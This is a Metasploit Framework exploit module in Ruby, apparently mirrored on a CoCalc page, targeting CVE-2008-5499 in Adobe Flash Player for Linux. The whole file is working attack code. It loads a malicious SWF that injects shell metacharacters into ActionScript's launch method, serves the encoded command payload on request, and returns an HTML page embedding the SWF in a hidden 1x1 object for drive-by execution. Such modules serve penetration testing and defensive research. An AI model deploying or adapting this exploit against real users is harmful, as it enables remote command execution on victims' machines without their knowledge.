CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability',

14
      'Description'    => %q{

15
          This module exploits a vulnerability in Adobe Flash Player for Linux,

16
          version 10.0.12.36 and 9.0.151.0 and prior.

17
          An input validation vulnerability allows command execution when the browser

18
          loads a SWF file which contains shell metacharacters in the arguments to

19
          the ActionScript launch method.

20


21
          The victim must have Adobe AIR installed for the exploit to work. This module

22
          was tested against version 10.0.12.36 (10r12_36).

23
        },

24
      'License'        => MSF_LICENSE,

25
      'Author'         =>

26
        [

27
          '0a29406d9794e4f9b30b3c5d6702c708', # Metasploit version

28
        ],

29
      'References'     =>

30
        [

31
          ['CVE', '2008-5499'],

32
          ['OSVDB', '50796'],

33
          ['BID', '32896'],

34
          ['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html']

35
        ],

36
      'DefaultOptions' =>

37
        {

38
          'HTTP::compression' => 'gzip',

39
          'HTTP::chunked'     => true

40
        },

41
      'Platform'       => 'unix', # so unix cmd exec payloads are ok

42
      'Arch'           => ARCH_CMD,

43
      'Targets'        =>

44
        [

45
          [ 'Automatic', {}],

46
        ],

47
      'DisclosureDate' => '2008-12-17',

48
      'DefaultTarget'  => 0))

49


50
  end

51


52
  def exploit

53
    path = File.join( Msf::Config.data_directory, "exploits", "CVE-2008-5499.swf" )

54
    fd = File.open( path, "rb" )

55
    @swf = fd.read(fd.stat.size)

56
    fd.close

57


58
    super

59
  end

60


61
  def on_request_uri(cli, request)

62
    msg = "#{cli.peerhost.ljust(16)} #{self.shortname}"

63
    trigger = @swf

64
    trigger_file = rand_text_alpha(rand(6)+3) + ".swf"

65


66
    obj_id = rand_text_alpha(rand(6)+3)

67


68
    if request.uri.match(/\.swf/i)

69
      print_status("#{msg} Sending Exploit SWF")

70
      send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })

71
      return

72
    end

73


74
    if request.uri.match(/\.txt/i)

75
      send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })

76
      return

77
    end

78


79
    html =  <<-EOS

80
    <html>

81
      <head>

82
      </head>

83
      <body>

84
      <center>

85
      <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="#{obj_id}" width="1" height="1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">

86
        <param name="movie" value="#{get_resource}#{trigger_file}" />

87
        <embed src="#{get_resource}#{trigger_file}" quality="high" width="1" height="1" name="#{obj_id}" align="middle" allowNetworking="all"

88
          type="application/x-shockwave-flash"

89
          pluginspage="http://www.macromedia.com/go/getflashplayer">

90
        </embed>

91


92
      </object>

93
    </center>

94


95
    </body>

96
    </html>

97
    EOS

98


99
    print_status("#{msg} Sending HTML...")

100
    send_response(cli, html, { 'Content-Type' => 'text/html' })

101
  end

102
end

103


104